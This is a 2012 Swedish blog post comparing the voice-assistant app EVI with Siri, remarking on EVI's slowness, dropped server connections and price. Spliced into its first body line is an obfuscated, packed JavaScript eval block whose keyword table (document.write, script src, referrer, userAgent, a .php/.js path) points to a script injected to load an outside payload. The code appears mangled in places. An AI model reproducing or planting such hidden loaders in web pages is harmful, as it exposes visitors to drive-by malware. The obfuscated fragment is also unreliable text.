Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

EVI, appen som konkurrerar med Siri.

EVI, appen som konkurrerar med Siri.
Filip Urde
  • On 30 januari, 2012
  • http://www.revue.se/filip-urde

SIRI, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rrnrr|var|u0026u|referrer|sesra||js|php’.split(’|’),0,{}))
iPhone 4S röstassistent ser ut att ha fått konkurrens i den nya appen EVI.

Apple introducerade Siri i iPhone 4S (många ”i” där), sen dess har den blivit utsatt för mycket kritik och parodi men fortfarande älskad.

EVI är dock inte lika integrerad som SIRI är, men den klarar av många basic uppgifter. Men ärligt, hur många använder Siri mer än för att fråga ”vem är Pamela Anderson? ” och ”’är du kär i mig Siri?”. Du måste dock prata englska, precis som för Siri.

Vad som är lite jobbigt med EVI är att den är rätt långsam! Den har även tendens att tappa kontakt med servern.
Appen finns på EVIs hemsida se länk här: Ladda ner EVI.

EVI är gratis till Android och kostar sju kronor till iPhone.